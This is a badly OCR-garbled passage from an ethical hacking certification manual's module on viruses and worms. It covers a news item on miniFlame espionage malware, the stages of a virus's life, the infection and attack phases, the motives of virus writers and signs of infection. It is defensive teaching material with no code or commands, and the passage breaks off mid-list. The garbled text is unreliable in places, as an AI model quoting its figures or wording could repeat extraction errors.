Ce hv8 module 07 viruses and worms

Ethical Hacking and Countermeasures
Viruses and W orm s

Exam 312-50 C ertified Ethical Hacker

V iru se s and W orm s
M o d u le 07

Engineered by Hackers. Presented by Professionals.

M

E th ic a l H a c k in g

a n d

C o u n te rm e a s u re s v 8

M o d u le 0 7 : V iru s e s a n d W o r m s
E xam 3 1 2 -5 0

M odule 07 Page 1007

Ethical Hacking and C ounterm easures Copyright © by EC-C0linCil
All Rights Reserved. Reproduction is S trictly Prohibited.

Viruses and W orm s


CEH

Secu rity N ew s
I GlobalResearch

H om e

P ro d u c ts

About

5«rv*ccs

O ctobe r 1 9 ,2 0 1 2

G lo b al C y b e r-W arfa re T a c tic s : N e w F la m e -lin k e d
M a lw a re used in “ C y b e r-E s p io n a g e ”
A n e w c y b e r e s p io n a g e p ro g ra m lin k e d t o th e n o to r io u s F lam e and Gauss m a lw a re has bee n d e te c te d by Russia's K aspersky Lab.
T he a n ti-v iru s g ia n t's c h ie f w a rn s t h a t g lo b a l c y b e r w a rfa r e is in " f u ll s w in g " a n d w ill p ro b a b ly e s c a la te in 2013.
T h e v iru s , d u b b e d m in iF la m e , a n d a lso k n o w n as SPE, has a lre a d y in fe c te d c o m p u te rs in Ira n , L e b a n o n , France, t h e U n ite d
S ta te s a n d L ith u a n ia . It w as dis c o v e re d in July 20 1 2 a n d is d e s c rib e d as "a small and highly flexible malicious program designed

to steal data and control infected systems during targeted cyber espionage operations," Kaspersky Lab said in a s ta te m e n t p o s te d
o n its w e b s ite .
T he m a lw a re w a s o rig in a lly id e n tifie d as an a p p e n d a g e o f F lam e - th e p ro g ra m used f o r ta rg e te d c y b e r e spionage in th e M id d le
East a n d a c k n o w le d g e d to be p a r t o f jo in t U S -ls ra e li e ffo r ts t o u n d e rm in e Iran 's n u c le a r p ro g ra m .
B u t la te r, K aspersky Lab a n a ly s ts d is c o v e re d t h a t m in iF la m e is a n "interoperable tool th a t could be used as an independent
malicious program, o r concurrently as a plug-in f o r both the Flame and Gauss m alw are."
^ ^ ^ ^ T h e a n a l y s i s a lso s h o w e d n e w e v id e n c e o f c o o p e ra tio n b e tw e e n th e c re a to rs o f F lam e a n d G a u s s ^ ^ ^ ^ ^ —

http ://www. globa/research, ca
Copyright © by EC-Cauactl. All Rights Reserved. Reproduction is Strictly Prohibited.

S e c u rity N e w s
an

M

G lo b a l C y b e r - W a r fa r e T a c tic s : N e w

M

M a lw a re u s e d in

F la m e - lin k e d

“ C y b e r-E s p io n a g e ”

S o u rc e : h t t p : / / w w w . g l o b a l r e s e a r c h . c a
A n e w c y b e r e s p io n a g e p r o g r a m lin k e d t o t h e n o t o r i o u s F la m e a n d G auss m a l w a r e has b e e n
d e t e c t e d b y Russia's K a s p e rsky Lab. T h e a n t i v i r u s g ia n t 's c h ie f w a r n s t h a t g lo b a l c y b e r w a r f a r e
is in " f u l l s w i n g " a n d p r o b a b l y e s c a la te in 2 0 1 3 .
T h e v iru s , d u b b e d m in iF la m e , a nd also k n o w n as SPE, has a lr e a d y i n f e c t e d c o m p u t e r s in Iran,
L e b a n o n , F rance, t h e

U n ite d States, a n d

L ith u a n ia . It w a s d is c o v e r e d

in July 2 0 1 2 a n d

is

d e s c r ib e d as "a s m a ll a n d h ig h ly f le x ib le m a lic io u s p r o g r a m d e s ig n e d t o ste a l d a ta a n d c o n t r o l
in fe c te d

s y s te m s

d u r in g

ta rg e te d

cyber

e s p io n a g e

o p e ra tio n s ,"

K a sp e rsky

Lab said

in a

s t a t e m e n t p o s te d o n its w e b s i t e .
The m a lw a re

w a s o r i g i n a l l y i d e n t if ie d

as an a p p e n d a g e o f F lam e, t h e

p ro g ra m

u sed f o r

t a r g e t e d c y b e r e s p io n a g e in t h e M i d d l e East a n d a c k n o w l e d g e d t o be p a r t o f j o i n t US-lsraeli
e f f o r t s t o u n d e r m i n e Ira n 's n u c l e a r p r o g r a m .


Ethical Hacking and C ounterm easures Copyright © by EC-C0UnCil

Viruses and W orm s


B u t la t e r , K a sp e rsky Lab a n a ly s ts d is c o v e r e d t h a t m i n i F l a m e is an " i n t e r o p e r a b l e t o o l t h a t c o u ld
be used as an i n d e p e n d e n t m a lic io u s p r o g r a m , o r c o n c u r r e n t l y as a p lu g - in f o r b o t h t h e Flam e
a n d Gauss m a l w a r e . "
T h e a na lysis also s h o w e d n e w e v id e n c e o f c o o p e r a t i o n b e t w e e n t h e c r e a t o r s o f F la m e a nd
Gauss, as b o t h v iru s e s can use m in i F la m e f o r t h e i r o p e r a t i o n s .
" M i n i F l a m e ' s a b i l it y t o be used as a p lu g - in b y e i t h e r F lam e o r Gauss c le a r ly c o n n e c ts t h e
c o ll a b o r a t i o n b e t w e e n t h e d e v e l o p m e n t t e a m s o f b o t h F la m e a n d Gauss. Since t h e c o n n e c t i o n
b e t w e e n F la m e a n d S t u x n e t / D u q u has a lr e a d y b e e n r e v e a le d , it can be c o n c l u d e d t h a t all th e s e
a d v a n c e d t h r e a t s c o m e f r o m t h e s a m e 'c y b e r w a r f a r e ' f a c t o r y , " K a s p e r s k y Lab said.
H ig h - p r e c is io n a tta c k to o l
So f a r j u s t 5 0 t o 6 0 cases o f in f e c t i o n h a v e b e e n d e t e c t e d w o r l d w i d e , a c c o r d in g t o K a sp e rs ky
Lab. B u t u n lik e F lam e a n d Gauss, m in iF la m e in m e a n t f o r in s t a l l a t i o n o n m a c h in e s a lr e a d y
i n f e c t e d b y t h o s e v iru se s .
" M i n i F l a m e is a h ig h - p r e c is io n a t t a c k t o o l . M o s t lik e ly it is a t a r g e t e d c y b e r w e a p o n used in
w h a t can be d e f i n e d as t h e s e c o n d w a v e o f a c y b e r a t t a c k , " K a s p e rsk y's C h ie f S e c u r ity E x p e rt
A l e x a n d e r G o s te v e x p la in e d .
"F ir s t, F la m e o r Gauss a re used t o in f e c t as m a n y v i c t i m s as p o s s ib le t o c o lle c t la rg e q u a n t i t i e s
o f i n f o r m a t i o n . A f t e r d a ta is c o lle c te d a n d r e v i e w e d , a p o t e n t i a l l y i n t e r e s t i n g v i c t i m is d e f i n e d
a n d i d e n t if ie d , a n d m in iF la m e is in s t a lle d in o r d e r t o c o n d u c t m o r e in - d e p t h s u r v e il l a n c e a nd
c y b e r-e s p io n a g e ."
T h e n e w l y - d i s c o v e r e d m a l w a r e can also t a k e s c r e e n s h o t s o f an i n f e c t e d c o m p u t e r w h i l e it is
r u n n i n g a s p e c ific p r o g r a m o r a p p li c a t i o n in such as a w e b b r o w s e r , M i c r o s o f t O ffic e p r o g r a m ,
A d o b e R eader, i n s t a n t m e s s e n g e r se rv ic e o r FTP c lie n t.
K a sp e rsky Lab b e lie v e s m in i F la m e 's d e v e lo p e r s h a v e p r o b a b l y c r e a te d d o z e n s o f d i f f e r e n t
m o d i f i c a t i o n s o f t h e p r o g r a m . " A t t h i s t i m e , w e h a v e o n l y f o u n d six o f th e s e , d a t e d 2 0 1 0 - 2 0 1 1 , "
t h e f i r m said.
‘C y b e r w a rfa re

i n f u ll s w i n g ’

M e a n w h i l e , K a s p e rs k y Lab's c o - f o u n d e r a n d CEO E u ge n e K a s p e rs k y w a r n e d t h a t g lo b a l c y b e r
w a r f a r e ta c tic s a re b e c o m i n g m o r e s o p h is t ic a t e d w h i l e also b e c o m i n g m o r e t h r e a t e n i n g . He
u rg e d g o v e r n m e n t s t o w o r k t o g e t h e r t o f i g h t c y b e r w a r f a r e a n d c y b e r - t e r r o r i s m , X in h u a n e w s
a g e n c y r e p o r ts .
S p e a k in g a t an I n t e r n a t i o n a l T e l e c o m m u n i c a t i o n U n io n T e le c o m W o r l d c o n f e r e n c e in D u b a i,
t h e a n t i v i r u s t y c o o n said, " c y b e r w a r f a r e is in fu ll s w in g a nd w e e x p e c t it t o e s c a la te in 2 0 1 3 ."
" T h e la t e s t m a lic io u s v ir u s a t t a c k o n t h e w o r l d ' s la r g e s t o il a n d gas c o m p a n y , Saudi A r a m c o , last
A u g u s t s h o w s h o w d e p e n d e n t w e a re t o d a y o n t h e I n t e r n e t a nd i n f o r m a t i o n t e c h n o l o g y in
g e n e r a l, a n d h o w v u ln e r a b l e w e a r e ," K a sp e rs ky said.
He s t o p p e d s h o r t o f b la m i n g a n y p a r t i c u l a r p la y e r b e h in d t h e m a s s iv e c y b e r - a t t a c k s across t h e
M i d d l e East, p o i n t i n g o u t t h a t " o u r j o b is n o t t o i d e n t i t y h a c k e rs o r c y b e r - t e r r o r i s t s . O u r f i r m is



Viruses and W orm s


like an X -ra y m a c h in e , m e a n i n g w e can scan a n d i d e n t i f y a p r o b l e m , b u t w e c a n n o t say w h o o r
w h a t is b e h in d i t . "
Iran, w h o c o n f i r m e d t h a t it s u f f e r e d an a t t a c k b y F la m e m a l w a r e t h a t ca u s e d s e v e re d a ta loss,
b la m e s t h e U n i t e d S ta te s a nd Israel f o r u n l e a s h i n g t h e c y b e r - a tta c k s .

C o p y r i g h t © 2 0 0 5 - 2 0 1 2 G lo b a lR e s e a r c h .c a
B y R u s s ia T o d a y

http://www.globalresearch.ca/global-cyber-warfare-tactics-new-flame-linked-malware-used-incyber-espionage/5308867



Viruses and W orm s


CEH

M odule O b jectives
J

Introduction to Viruses

J

Computer Worms

J

Stages of Virus Life

J

Worm Analysis

J

Working of Viruses

J

Worm Maker

J

Indications of Virus Attack

J

Malware Analysis Procedure

J

How does a ComputerGet Infected
by Viruses

J

Online Malware Analysis Services

y

Virus Analysis

J

Virus and Worms Countermeasures

J

Types of Viruses

J

Antivirus Tools

J

Virus Maker

J

Penetration Testing for Virus

Copyright © by

EC auactl. All Rights Reserved. Reproduction is Strictly Prohibited.
-C

M o d u le O b je c tiv e s
T h e o b j e c t iv e o f th is m o d u l e is t o e x p o s e y o u t o t h e v a r io u s v iru s e s a n d w o r m s
a v a ila b le to d a y . It g ive s y o u i n f o r m a t i o n a b o u t all t h e a v a ila b le v iru s e s a n d w o r m s . This m o d u l e
e x a m in e s t h e w o r k i n g s o f a c o m p u t e r v iru s , its f u n c t i o n , c la s s ific a tio n , a n d t h e m a n n e r in w h i c h
it a ffe c ts s y s te m s . T his m o d u l e w ill go i n t o d e ta il a b o u t t h e v a r io u s c o u n t e r m e a s u r e s a v a ila b le
t o p r o t e c t a g a in s t th e s e v ir u s i n f e c tio n s . T h e m a in o b j e c t iv e o f th is m o d u l e is t o e d u c a t e y o u
a b o u t t h e a v a ila b le v iru s e s a nd w o r m s , i n d i c a t i o n s o f t h e i r a t t a c k a nd t h e w a y s t o p r o t e c t
a g a in s t v a r io u s v iru s e s , a n d t e s t i n g y o u r s y s te m o r n e t w o r k a g a in s t v iru s e s o r w o r m s p re s e n c e .
T his m o d u l e w i ll f a m i l i a r i z e y o u w i t h :
0

I n t r o d u c t i o n t o V iru s e s

0

C o m p u te r W o rm s

0

Stages o f V ir u s Life

0

W o r m A n a ly s is

0

W o r k i n g o f V iru s e s

0

W o rm M aker

0

I n d ic a tio n s o f V ir u s A t t a c k

0

M a l w a r e A n a ly s is P r o c e d u r e

0

How

0

O n lin e M a l w a r e A n a ly s is Services

0

V ir u s a nd W o r m s

D oes

a

C o m p u te r

V iru se s?
0

T y p e s o f V iru s e s

In f e c t e d

by

C o u n te rm e a su re s

V ir u s A n a ly s is

0

Get

Modute07

!M a k e r

0

A n t i v i r u s T o o ls

Ethical H a c k if^ a n P ^ f i t F i S t i a n e T e ^ Q g t f e f y V i F W f i l l C i l

Viruses and W orm s


Module Flow

Virus and
Worms
Concepts

Typ e s of
Viruses

Penetration
Testing

Com puter
Worms

Countermeasures

M alware
Analysis

Copyright © by

E&Ctlllcil. All Rights Reserved. Reproduction is Strictly Prohibited.

M o d u le F lo w
T his s e c tio n in t r o d u c e s y o u t o v a r io u s v iru s e s a n d w o r m s a v a ila b le t o d a y a n d g ive s y o u
a b r i e f o v e r v i e w o f e a ch v ir u s a n d s t a t i s t i c s o f v iru s e s a n d w o r m s in t h e r e c e n t y e a rs. It lists
v a r io u s t y p e s o f v iru s e s a nd t h e i r e f fe c ts o n y o u r s y s te m . T h e w o r k i n g o f v iru s e s in e a c h p h a s e
has w i ll be d iscu sse d in d e ta il. T h e t e c h n i q u e s used b y t h e a t t a c k e r t o d i s t r i b u t e m a l w a r e o n
t h e w e b a re h ig h lig h t e d .

M alware Analysis

V ir u s a n d W o r m s C o n c e p t

,‫• נ‬

Types of Viruses

‫— /י‬

Computer W orm s

fj| Countermeasures
||‫־‬
^

Penetration Testing

V ‫— ׳׳‬



Viruses and W orm s


Introduction to V iru se s

C EH

_l A virus is a self-replicating program that produces its own copy by attaching itself
to another program, computer boot sector or document
J

Viruses are generally transmitted through file downloads, infected disk/flash
drives and as email attachments

V ir u s C h a r a c t e r is t ic s

Alters Data

Infects Other Program

V

%
Corrupts Files and
Programs

Transforms Itself

m

F*

Encrypts Itself

m

Copyright © by

Self Propagates

%
#
1 f §

1

-C

‫ ןא‬I n t r o d u c t i o n to V i r u s e s
C o m p u t e r v i r u s e s h a v e t h e p o t e n t i a l t o w r e a k h a v o c o n b o t h b u sin e ss a n d p e r s o n a l
c o m p u t e r s . W o r l d w i d e , m o s t b u sin e sse s h a ve b e e n i n f e c t e d a t s o m e p o i n t . A v ir u s is a se lfr e p li c a t i n g p r o g r a m t h a t p r o d u c e s its o w n c o d e b y a t t a c h i n g c o p ie s o f it i n t o o t h e r e x e c u ta b le
c o d e s. T his v ir u s o p e r a t e s w i t h o u t t h e k n o w l e d g e o r d e s ire o f t h e user. Like a real v iru s , a
c o m p u t e r v ir u s is c o n t a g i o u s a n d can c o n t a m i n a t e o t h e r file s. H o w e v e r , v iru s e s can i n f e c t
o u t s i d e m a c h in e s o n l y w i t h t h e a ss ista n ce o f c o m p u t e r users. S o m e v iru s e s a f f e c t c o m p u t e r s as
soon

as t h e i r c o d e is e x e c u t e d ; o t h e r v iru s e s lie d o r m a n t u n t i l a p r e - d e t e r m i n e d

logical

c i r c u m s t a n c e is m e t . T h e r e a re t h r e e c a te g o r ie s o f m a lic io u s p r o g r a m s :
0

T r o ja n s a n d r o o t k i t s

0

V iru s e s

0

W o rm s

A w o r m is a m a lic io u s p r o g r a m t h a t can in f e c t b o t h local a n d r e m o t e m a c h in e s . W o r m s s p re a d
a u t o m a t i c a l l y b y in f e c t i n g s y s te m a f t e r s y s te m in a n e t w o r k , a n d e v e n s p r e a d in g f u r t h e r t o
o t h e r n e t w o r k s . T h e r e f o r e , w o r m s h a ve a g r e a t e r p o t e n t i a l f o r c a u s in g d a m a g e b e c a u s e t h e y
d o n o t r e ly o n t h e u s e r's a c tio n s f o r e x e c u t i o n . T h e r e a re also m a l i c i o u s p r o g r a m s in t h e w i ld
t h a t c o n t a i n all o f t h e f e a t u r e s o f th e s e t h r e e m a lic io u s p r o g r a m s .



Viruses and W orm s


Virus and Worm Statistics

75,000,000

60,000,000

45,000,000

30,000,000

15,000,000

2010

2008

Copyright © by

2011

2012
http://www.av-test. org

E&Ctinctl. All Rights Reserved. Reproduction is Strictly Prohibited.

^ V iru s a n d W o rm S ta tis tic s
S o u rc e : h t t p : / / w w w . a v - t e s t . o r g
T his g ra p h ic a l r e p r e s e n t a t i o n g ive s d e t a i le d i n f o r m a t i o n o f t h e a t t a c k s t h a t h a v e o c c u r r e d in
t h e r e c e n t y e a rs. A c c o r d i n g t o t h e g r a p h , o n l y 1 1 ,6 6 6 , 6 6 7 s y s te m s w e r e a f f e c t e d b y v iru s e s a nd
w orm s

in t h e

year 2008,

w he re a s

in t h e

ye ar 2012, th e

c o u n t d ra s tic a lly

in c r e a s e d

to

7 0 ,0 0 0 ,0 0 0 s y s te m s , w h i c h m e a n s t h a t t h e g r o w t h o f m a l w a r e a tta c k s o n s y s te m s is in c r e a s in g
e x p o n e n t ia l ly y e a r b y ye a r.



Viruses and W orm s


7 5 .0 0 0 .0 0 0

6 0 .0 0 0 .0 0 0

4 5 .0 0 0 .0 0 0

3 0 .0 0 0 .0 0 0

1 5 .0 0 0 .0 0 0

0
2008

2009

2010

2011

2012

FIGURE 7.1: Virus and Worm Statistics


Ethical Hacking and C ounterm easures Copyright © by EC-COUIlCil

Viruses and W orm s


Design

Replication

Launch

D eveloping virus

V iru s replicates fo r

code using

a perio d o f tim e

It gets activated w ith
th e user p e rfo rm in g

p ro g ra m m in g

w ith in th e ta rg e t

certa in action s such

languages or

system and th e n

as ru n n in g an

c o n s tru c tio n kits

spreads its e lf

in fected program

Incorporation

Detection

Users in s ta ll

Elim ination

A n tiv iru s s o ftw a r e

A v iru s is id e n tifie d

a n tiv iru s u p d a te s

d e v e lo p e rs

as t h re a t in fe c tin g

a n d e lim in a te th e

a s s im ila te d efenses

ta rg e t system s

v iru s th re a ts

a g a in s t th e viru s

S t a g e s o f V i r u s L ife
C o m p u t e r v ir u s a tta c k s s p re a d t h r o u g h v a r io u s sta ge s f r o m i n c e p t io n t o d e s ig n t o
e lim in a tio n .

1.

Design:
A v ir u s c o d e is d e v e lo p e d by u s in g p r o g r a m m i n g la n g u a g e s o r c o n s t r u c t i o n kits. A n y o n e
w i t h basic p r o g r a m m i n g k n o w l e d g e can c r e a te a viru s .

2.

Replication:
A v ir u s f i r s t r e p lic a te s it s e lf w i t h i n a t a r g e t s y s te m o v e r a p e r io d o f t i m e .

3.

Launch:
It is a c t i v a t e d w h e n a u s e r p e r f o r m s c e r t a i n a c tio n s such as t r i g g e r i n g o r r u n n i n g an
in fe c te d p ro g ra m .

4.

Detection:
A v ir u s is i d e n t if ie d as a t h r e a t i n f e c t i n g t a r g e t s y s te m s . Its a c tio n s ca use c o n s id e r a b le
d a m a g e t o t h e t a r g e t s y s te m 's d a ta .



Viruses and W orm s

5.


Incorporation:
A n t i v i r u s s o f t w a r e d e v e l o p e r s a s s e m b l e d e f e n s e s a g a in s t t h e viru s .

6.

Elimination:
Users a re a d v is e d t o in s ta ll a n t i v i r u s s o f t w a r e u p d a te s , t h u s c r e a t i n g a w a r e n e s s a m o n g
user g ro up s



Viruses and W orm s


Working of Viruses: Infection
Phase
Infection
Phase

J

In the infection phase, the virus replicates itself
and attaches to an .exe file in the system

Before Infection

After Infection

*
C lean File

V iru s In fe c te d
File

Copyright © by

E -G
G 0llicil. All Rights Reserved. Reproduction is Strictly Prohibited.

W o rk in g o f V iru se s: In fe c tio n P h a s e
V ir u s e s

a tta c k

a ta rg e t

h o s t's

s y s te m

by

u sin g

v a r io u s

m e th o d s .

They

a tta c h

t h e m s e l v e s t o p r o g r a m s a n d t r a n s m i t t h e m s e l v e s t o o t h e r p r o g r a m s by m a k in g use o f c e r ta in
e v e n ts . V iru s e s n e e d such e v e n ts t o ta k e p la ce sin ce t h e y c a n n o t:
©

S e lf s t a r t

©

In f e c t o t h e r h a r d w a r e

©

Cause p h y s ic a l d a m a g e t o a c o m p u t e r

©

T r a n s m i t t h e m s e l v e s u sin g n o n - e x e c u t a b l e file s

G e n e r a lly v iru s e s h a ve t w o phases, t h e i n f e c t i o n p h a s e a n d t h e a t t a c k p h a s e .
In t h e i n f e c t i o n p ha se, t h e v i r u s r e p li c a t e s i t s e lf a n d a t t a c h e s t o an .e xe f ile in t h e s y s te m .
P r o g r a m s m o d i f i e d by a v ir u s i n f e c t i o n can e n a b le v ir u s f u n c t i o n a l i t i e s t o ru n o n t h a t s y s te m .
V iru s e s g e t e n a b le d as s o o n as t h e i n f e c t e d p r o g r a m is e x e c u te d , since t h e p r o g r a m c o d e leads
t o t h e v ir u s c o d e . V ir u s w r i t e r s h a v e t o m a i n t a i n a b a la n c e a m o n g f a c t o r s such as:
©

H o w w i ll t h e v ir u s in f e c t?

©

H o w w i ll it s p re a d ?

©

H o w w i ll it re s id e in a t a r g e t c o m p u t e r ' s m e m o r y w i t h o u t b e in g d e t e c t e d ?



Viruses and W orm s


O b v io u s ly , v iru s e s h a v e t o b e t r i g g e r e d a n d e x e c u t e d in o r d e r t o f u n c t i o n . T h e r e a re m a n y w a y s
t o e x e c u te p r o g r a m s w h i l e a c o m p u t e r is r u n n in g . For e x a m p le , a n y s e tu p p r o g r a m calls f o r
n u m e r o u s p r o g r a m s t h a t m a y be b u i l t i n t o a s y s te m , a n d s o m e o f th e s e a re d i s t r i b u t i o n
m e d i u m p r o g r a m s . T hu s, if a v ir u s p r o g r a m a lr e a d y exists, it can be a c tiv a te d w i t h t h is k in d o f
e x e c u t i o n a n d in f e c t t h e a d d it io n a l s e t u p p r o g r a m as w e ll.
T h e r e a re v ir u s p r o g r a m s t h a t in f e c t a n d k e e p s p r e a d in g e v e r y t i m e t h e y a re e x e c u te d .

Some

p r o g r a m s d o n o t in f e c t t h e p r o g r a m s w h e n f i r s t e x e c u te d . T h e y re s id e in a c o m p u t e r ' s m e m o r y
a n d in f e c t p r o g r a m s a t a l a t e r t i m e . Such v ir u s p r o g r a m s as TSR w a i t f o r a s p e c ifie d t r i g g e r
e v e n t t o s p re a d a t a l a t e r s ta ge . It is, t h e r e f o r e , d i f f i c u l t t o r e c o g n iz e w h i c h e v e n t m i g h t t r i g g e r
t h e e x e c u t i o n o f a d o r m a n t v ir u s i n f e c t i o n .
R e fe r t o t h e f i g u r e t h a t f o l l o w s t o see h o w t h e EXE file i n f e c t i o n w o r k s .
In t h e f o l l o w i n g f ig u r e , t h e .EXE file 's h e a d e r , w h e n t r i g g e r e d , e x e c u te s a n d s ta r t s r u n n i n g t h e
a p p li c a t i o n . O n c e t h is file is i n f e c t e d , a n y t r i g g e r e v e n t f r o m t h e file 's h e a d e r can a c t i v a t e t h e
v ir u s c o d e t o o , a lo n g w i t h t h e a p p li c a t i o n p r o g r a m as s o o n as it is ru n .
Q

A f ile v ir u s i n f e c ts b y a t t a c h i n g its e lf t o an e x e c u t a b l e s y s te m a p p li c a t i o n p r o g r a m . T e x t
file s su ch as s o u r c e c o d e , b a tc h file s, s c r ip t files, e tc., a re c o n s id e r e d p o t e n t i a l t a r g e t s
f o r v iru s in f e c tio n s .

©

B o o t s e c t o r v iru s e s e x e c u te t h e i r o w n c o d e in t h e f i r s t p la ce b e f o r e t h e t a r g e t PC is
b o o te d

Before Infection

A fte r Infection

.exe

N

_u

Clean File

Virus Infected
File

FIGURE 7.2: Working of Viruses in Infection Phase



Viruses and W orm s


Working of Viruses: Attack
D U

^ ^

r cu
V t

o q p

11

Urt‫׳‬fW
< ttkxjl Nm Im

J

Viruses are programmed with trigger events to activate and corrupt systems

J

Some viruses infect each time they are run and others infect only when a certain
predefined condition is met such as a user's specific ta sk , a day, time, or a
particular event

Unfragmented File Before Attack
File: A

1

1
1

Page:2

J _____________ 1
Page:3

A

Page: 1

File: B

1

A

Page:2

Page: 1

Page:3

File Fragmented Due to Virus Attack
Page: 1
File: A

Page:3
File: B

Page:3
File: A

Page: 1
File: B

Copyright © by

Page:2
File: B

Page:2
File: A

E&
Cauactl. All Rights Reserved. Reproduction is Strictly Prohibited.

W o rk in g o f V iru se s: A tta c k P h a s e
O n c e v iru s e s s p re a d t h e m s e l v e s t h r o u g h o u t t h e t a r g e t s y s te m , t h e y s t a r t c o r r u p t i n g
t h e fi l e s a n d p r o g r a m s o f t h e h o s t s y s te m . S o m e v iru s e s h a v e t r i g g e r e v e n ts t h a t n e e d t o be
a c t i v a t e d t o c o r r u p t t h e h o s t s y s te m . S o m e v i r u s e s h a v e bugs t h a t r e p lic a t e th e m s e lv e s , a nd
p e r f o r m a c tiv it ie s such as d e l e t i n g f i l e s a n d in c r e a s in g s e s s io n t i m e .
T h e y c o r r u p t t h e i r t a r g e t s o n l y a f t e r s p r e a d in g as i n t e n d e d b y t h e i r d e v e lo p e r s . M o s t v iru s e s
t h a t a t t a c k t a r g e t s y s te m s p e r f o r m a c tio n s such as:
Q

D e le tin g file s a n d a l t e r i n g c o n t e n t in d a ta file s, t h e r e b y c a u s in g t h e s y s te m t o s lo w
down

e

P e r f o r m in g

ta sks

not

r e la t e d

to

a p p lic a tio n s ,

such

as p la y in g

m u s ic

and

c r e a tin g

a n im a tio n s



Viruses and W orm s


U n f r a g m e n t e d F ile B e fo r e A t t a c k

File: A
Page: 1

Page: 2

File: B
Page: 3

Page: 1

Page: 2

Page: 3

A

F ile F r a g m e n t e d D u e t o V ir u s A t t a c k

Page: 1
File: A

Page: 3
File: B

Page: 1
File: B

Page: 3
File: A

Page: 2
File: B

A

Page: 2
File: A
A

FIGURE 7.3: Working of Viruses in Attack Phase

R e fe r t o t h is f i g u r e , w h i c h has t w o file s, A a n d B. In s e c tio n o n e , t h e t w o file s a re l o c a te d o n e
a f t e r t h e o t h e r in an o r d e r l y f a s h io n . O n c e a v ir u s c o d e i n f e c ts t h e file , it a lte r s t h e p o s i t i o n i n g
o f t h e file s t h a t w e r e c o n s e c u t i v e l y p la c e d , t h u s l e a d in g t o in a c c u r a c y in f ile a llo c a tio n s , c a u s in g
t h e s y s te m t o s l o w d o w n as users t r y t o r e t r i e v e t h e i r file s. In t h i s p ha se:
©

V iru s e s e x e c u te w h e n s o m e e v e n ts a re t r i g g e r e d

0

S o m e e x e c u te a n d c o r r u p t via b u i l t - i n b u g p r o g r a m s a f t e r b e in g s t o r e d in t h e h o s t's
m em ory

0

M o s t v iru s e s a re w r i t t e n t o c o n c e a l t h e i r p re s e n c e , a t t a c k in g o n l y a f t e r s p r e a d in g in t h e
h o s t t o t h e f u l le s t e x t e n t



Viruses and W orm s


W h y Do People Create Computer
Viruses

r cu
|

UrtifWd

ttkiul Km Im

Computer Viruses
Inflict damage to competitors

J
J
J

Financial benefits

Research projects

Play prank

Vandalism

Cyber terrorism
Distribute political messages
V u ln e r a b le S y s te m

Copyright © by

E&

W hy Do P e o p le C re a te C o m p u te r V iru se s?
S o u rc e : h t t p : / / w w w . s e c u r i t y d o c s . c o m
C o m p u t e r v iru s e s a re n o t s e lf - g e n e r a t e d , b u t a re c r e a te d b y c y b e r - c r i m i n a l m in d s , i n t e n t i o n a l l y
d e s ig n e d t o ca use d e s t r u c t i v e o c c u r r e n c e s in a s y s te m . G e n e ra lly , v iru s e s a re c r e a te d w i t h a
d is r e p u t a b l e m o t i v e . C y b e r - c r im i n a l s c r e a te v iru s e s t o d e s t r o y a c o m p a n y 's d a ta , as an a c t o f
v a n d a lis m o r a p ra n k , o r t o d e s t r o y a c o m p a n y 's p r o d u c ts . H o w e v e r , in s o m e cases, v iru s e s are
a c t u a lly

in te n d e d

to

be g o o d

fo r

a s y s te m . T he se

a re

d e s ig n e d

to

im p ro v e

a s y s te m 's

p e r f o r m a n c e b y d e l e t in g p r e v io u s ly e m b e d d e d v iru s e s f r o m files.
S o m e r e a s o n s v iru s e s h a v e b e e n w r i t t e n in c lu d e :
e

I n flic t d a m a g e t o c o m p e t i t o r s

e

R esearch p r o je c ts

0

Pranks

Q

V a n d a lis m

e

A t t a c k t h e p r o d u c t s o f s p e c ific c o m p a n i e s

©

D is t r i b u t e p o litic a l m essa ge s

0

F ina ncia l g ain



Viruses and W orm s

Q

Id e n tity th e ft

Q

S pyw are

Q


C r y p t o v ir a l e x t o r t i o n



Ethical Hacking and Counterm easures
Viruses and W orm s


P rocesses ta k e
m o re re s o u rc e s
a n d tim e

C o m p u te r s lo w s
dow n when
p r o g ra m s s ta rt

C o m p u te r fre e z e s
fr e q u e n t ly o r
e n c o u n te rs e r ro r

I n d ic a tio n s o f V iru s A tta c k s
A n e f f e c t i v e v iru s t e n d s t o m u l t i p l y r a p id l y a n d m a y in f e c t a n u m b e r o f m a c h in e s
w i t h i n t h r e e t o f iv e days. V iru s e s ca n in f e c t W o r d fi l e s w h i c h , w h e n t r a n s f e r r e d , can in f e c t t h e
m a c h in e s o f t h e u sers w h o r e c e iv e t h e m . A v ir u s can also m a k e g o o d use o f f ile s e rv e rs in o r d e r
t o i n f e c t file s . T h e f o l l o w i n g a re i n d i c a t i o n s o f a v i r u s a t t a c k o n a c o m p u t e r s y s te m :
Q

P r o g r a m s ta k e lo n g e r t o loa d

Q

T h e h a r d d r iv e is a lw a y s fu ll, e v e n w i t h o u t in s t a llin g a n y p r o g r a m s

Q

T h e f l o p p y d is k d r iv e o r h a r d d r i v e r u n s w h e n it is n o t b e in g used

9

U n k n o w n file s k e e p a p p e a r i n g o n t h e s y s te m

0

T h e k e y b o a r d o r t h e c o m p u t e r e m i t s s tr a n g e o r b e e p in g s o u n d s

Q

T h e c o m p u t e r m o n i t o r d is p la y s s tr a n g e g r a p h ic s

Q

File n a m e s t u r n s tr a n g e , o f t e n b e y o n d r e c o g n i t i o n

Q

T h e h a r d d r iv e b e c o m e s in a c c e s s ib le w h e n t r y i n g t o b o o t f r o m t h e f l o p p y d r i v e

©

A p r o g r a m 's size k e e p s c h a n g in g

Q

T h e m e m o r y o n t h e s y s te m s e e m s t o be in use a nd t h e s y s te m s lo w s d o w n



Viruses and W orm s


H o w does a Computer Get
Infected by Viruses
W h e n a user accepts files and d o w nloads w ith o u t checking
p ro p e rlyfo rth e source

‫ן‬

ing infected e-mail attachm ents

Installing pirated so ftw are

Not updatingand not installing new versions o f plug-ins

: runningthe latest anti-virus application


H ow D o es a C o m p u te r G et In fe c te d b y V iru se s?
T h e r e a re m a n y w a y s in w h i c h a c o m p u t e r g e ts i n f e c t e d b y viru s e s . T h e m o s t p o p u l a r
m e t h o d s a re as f o l lo w s :
©

W h e n a u s e r a c c e p ts file s a n d d o w n l o a d s w i t h o u t c h e c k in g p r o p e r l y f o r t h e s o u rc e .

©

A t t a c k e r s u s u a lly se n d v i r u s - in f e c t e d file s as e m a il a t t a c h m e n t s t o s p re a d t h e v ir u s on
t h e v i c t i m ' s s y s t e m . If t h e v i c t i m o p e n s t h e m a il, t h e v ir u s a u t o m a t i c a l l y i n f e c ts t h e
s y s te m .

©

